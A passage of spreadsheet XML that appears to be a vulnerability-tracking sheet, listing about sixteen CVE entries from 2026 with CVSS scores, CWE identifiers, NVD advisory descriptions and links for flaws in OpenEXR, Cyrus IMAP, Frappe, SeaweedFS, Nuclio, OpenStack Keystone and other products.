      <c r="N595" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O595" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P595" s="5" t="inlineStr"/>
      <c r="Q595" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R595" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 are vulnerable to a heap out-of-bounds write when exrmetrics reads a crafted deep scanline EXR. This occurs with pixel conversion options such as --pixelmode float or --bench because DeepSlice requests FLOAT output while the backing sample buffers are allocated using the input HALF element size. The issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="S595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59187</t>
        </is>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B596" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59189</t>
        </is>
      </c>
      <c r="D596" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F596" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G596" s="5" t="inlineStr"/>
      <c r="H596" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I596" s="5" t="inlineStr"/>
      <c r="J596" s="5" t="inlineStr"/>
      <c r="K596" s="5" t="inlineStr"/>
      <c r="L596" s="5" t="inlineStr"/>
      <c r="M596" s="5" t="inlineStr"/>
      <c r="N596" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O596" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P596" s="5" t="inlineStr"/>
      <c r="Q596" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R596" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In OpenEXRUtil versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.12, the documented TypedDeepImageChannel&lt;T&gt;::row() API can return an out-of-bounds pointer when a deep image has a non-zero dataWindow origin, resulting in a heap out-of-bounds read and crash, with potential information disclosure under a controlled heap layout. The flaw arises because ImfDeepImageChannel uses two conflicting coordinate models: at(x, y) uses absolute coordinates (with _base offset by dataWindow.min), while row(r) is documented as 0-based logical access. For a non-zero dataWindow.min, row(0) therefore points outside the _sampleListPointers allocation instead of at the first logical row. This issue is fixed in versions 3.3.13 and 3.4.13.</t>
        </is>
      </c>
      <c r="S596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59189</t>
        </is>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B597" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59981</t>
        </is>
      </c>
      <c r="D597" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F597" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G597" s="5" t="inlineStr"/>
      <c r="H597" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I597" s="5" t="inlineStr"/>
      <c r="J597" s="5" t="inlineStr"/>
      <c r="K597" s="5" t="inlineStr"/>
      <c r="L597" s="5" t="inlineStr"/>
      <c r="M597" s="5" t="inlineStr"/>
      <c r="N597" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O597" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P597" s="5" t="inlineStr"/>
      <c r="Q597" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R597" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image file format, widely used in the motion picture industry. In versions through 3.2.10, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, the OpenEXRUtil library returns an out-of-bounds pointer from the SampleCountChannel::row() API when a deep image has a non-zero dataWindow origin. The row() accessor is documented as 0-based and computes its address from an internal base that is offset for absolute pixel coordinates, so the two coordinate models conflict whenever dataWindow.min is non-zero. For a deep image whose data window has a large negative vertical origin, row(0) points far outside the allocated sample-count buffer. An application that opens an attacker-controlled deep EXR file and accesses sample counts through row() performs an out-of-bounds read, which can crash the process or, under a controlled heap layout, return adjacent heap memory as sample-count values. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59981</t>
        </is>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B598" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59982</t>
        </is>
      </c>
      <c r="D598" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F598" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G598" s="5" t="inlineStr"/>
      <c r="H598" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I598" s="5" t="inlineStr"/>
      <c r="J598" s="5" t="inlineStr"/>
      <c r="K598" s="5" t="inlineStr"/>
      <c r="L598" s="5" t="inlineStr"/>
      <c r="M598" s="5" t="inlineStr"/>
      <c r="N598" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O598" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P598" s="5" t="inlineStr"/>
      <c r="Q598" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-787</t>
        </is>
      </c>
      <c r="R598" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. OpenEXR versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13 can return an out-of-bounds pointer from TypedDeepImageChannel::row() when a crafted deep EXR has a nonzero dataWindow origin. This vulnerability occurs because the API combines zero-based row access with an absolute-coordinate-adjusted base pointer, allowing a crash or limited information disclosure. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59982</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61915</t>
        </is>
      </c>
      <c r="D599" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr"/>
      <c r="K599" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L599" s="5" t="inlineStr"/>
      <c r="M599" s="5" t="inlineStr"/>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr"/>
      <c r="Q599" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R599" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. There is a VPATCH BYPARAM double-free. An authenticated calendar user could crash a Cyrus CalDAV worker with a PATCH containing PATCH-ACTION="BYPARAM@..." against a resource with two or more properties of the matched kind. The memory holding the selector would be freed once on each iteration over the properties.</t>
        </is>
      </c>
      <c r="S599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61915</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66003</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr"/>
      <c r="Q600" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework written in Python and JavaScript. Prior to version 15.115.0, an access control bypass in the REST API allows a user to read data from Linked DocTypes that they are not authorized to access. When a document references another document through a Link field, the framework does not consistently enforce the linked DocType's own permissions when the record is retrieved through the REST API, so a low-privileged authenticated user can obtain fields from linked records outside their permitted scope. This issue is fixed in version 15.115.0.</t>
        </is>
      </c>
      <c r="S600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66003</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68513</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr"/>
      <c r="Q601" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. Versions 3.3.0 through 3.3.12 and 3.4.0 through 3.4.13 contain a heap buffer overflow in PyOpenEXR triggered by a channel-name key collision between literal and prefixed RGB channels. When separate_channels=false, PyOpenEXR maps each physical channel name through channelNameToRGBA() and coalesces the results into a shared RGB array. A crafted flat scanline EXR that contains both a literal channel such as left and prefixed channels such as left.R, left.G, and left.B causes these names to collide, so the wrapper reuses an undersized two-dimensional NumPy array for the coalesced RGB slices and writes out of bounds when OpenEXR.File(path) decodes the pixels. This issue is fixed in versions 3.3.13 and 3.4.14.</t>
        </is>
      </c>
      <c r="S601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68513</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68515</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr"/>
      <c r="Q602" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>OpenEXR is the reference implementation and specification for the EXR image format, widely used in the motion picture industry. In versions before 3.2.11, 3.3.0 through 3.3.12, and 3.4.0 through 3.4.13, exrmultiview can write past a heap allocation when it combines two attacker-supplied, individually valid scanline EXR files whose union dataWindow is not aligned to one view's channel subsampling. The utility allocates sampled channel storage using a truncated union_width / xSampling, then reads the sampled input through a Slice based on the misaligned union window, producing a heap out-of-bounds write. The trigger is normal public-tool processing, such as exrmultiview left A.exr right B.exr out.exr with crafted but valid inputs, so this is not solely an API or caller-precondition issue. This issue is fixed in versions 3.2.11, 3.3.13, and 3.4.14.</t>
        </is>
      </c>
      <c r="S602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68515</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75369</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr"/>
      <c r="M603" s="5" t="inlineStr"/>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr"/>
      <c r="Q603" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R603" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in the CAN::Application::parsePerformFunctionMessage component of SpaceDot AcubeSAT OBC software commit eaf90ec allows attackers to cause a Denial of Service (DoS) via supplying a crafted CAN message.</t>
        </is>
      </c>
      <c r="S603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75369</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77611</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr"/>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr"/>
      <c r="Q604" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions prior to 4.40, an authenticated S3 principal with permissions scoped to a nested object key can overwrite a different object outside that scope by calling PutObjectAcl on the key it is allowed to access. The handler authorizes the request against the requested nested key but then writes the updated entry back to the bucket root rather than the key's actual parent directory, so an ACL change on allowed/protected.txt is instead applied to protected.txt at the bucket root. Because the update carries the full entry rather than only ACL metadata, an existing target object is overwritten with the content, metadata, owner information, and ACL of the scoped object, bypassing the object-level action scoping configured through the static S3 identity file. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="S604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77611</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77847</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr"/>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr"/>
      <c r="Q605" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>Tycon Systems TPDIN-Monitor-WEB3 versions 2.2.9 and prior are vulnerable to a use of hard-coded credential vulnerability. This could allow an attacker to intercept sensitive information or credentials.</t>
        </is>
      </c>
      <c r="S605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77847</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79617</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr"/>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr"/>
      <c r="Q606" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>Incorrect Permission Assignment for Critical Resource vulnerability in TÜBİTAK BİLGEM Software Technologies Research Institute Pardus LightDM Greeter allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Pardus LightDM Greeter: before 0.4.15.</t>
        </is>
      </c>
      <c r="S606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79617</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79754</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K607" s="5" t="inlineStr"/>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr"/>
      <c r="Q607" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. From version 1.6.19 to before version 1.17.2, Nuclio's Dashboard build pipeline does not sanitize the spec.build.tempDir field before using it to construct a shell command. When the Kaniko container builder is enabled, a user with function-create permission can inject shell metacharacters into this field and achieve arbitrary command execution inside the Dashboard container, which runs with a Kubernetes service account holding wildcard access to Secrets, Pods, Jobs, and Deployments in its namespace. This issue has been patched in version 1.17.2.</t>
        </is>
      </c>
      <c r="S607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79754</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80183</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr"/>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr"/>
      <c r="Q608" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, any authenticated user holding role:reader on any project can list every project-scoped role assignment under any domain by passing a domain ID as scope.project.id with include_subtree to the GET /v3/role_assignments endpoint. The domain's project record has domain_id=null, causing the policy domain_id check to pass for any caller. With include_names, the response discloses the names and home-domain IDs of every user, group, project, and role involved. The literal "default" domain ID works against any deployment created with keystone-manage bootstrap. An attacker can harvest domain IDs from the response and repeat the query to map role assignments across the entire cloud. This is caused by misuse of "None" in 
list_role_assignments_for_tree.</t>
        </is>
      </c>
      <c r="S608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80183</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81330</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr"/>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr"/>
      <c r="Q609" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>The C6 ear camera transmits live video to the EarVision Android application over unencrypted UDP streams. The application manifest permits cleartext traffic, and captured network traffic contains reconstructable JPEG or WEBP video frames transmitted over UDP. An attacker within local wireless range may capture and reconstruct the live video stream without transport encryption.</t>
        </is>
      </c>
      <c r="S609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81330</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82392</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr"/>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr"/>
      <c r="Q610" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R610" s="5" t="inlineStr">
        <is>
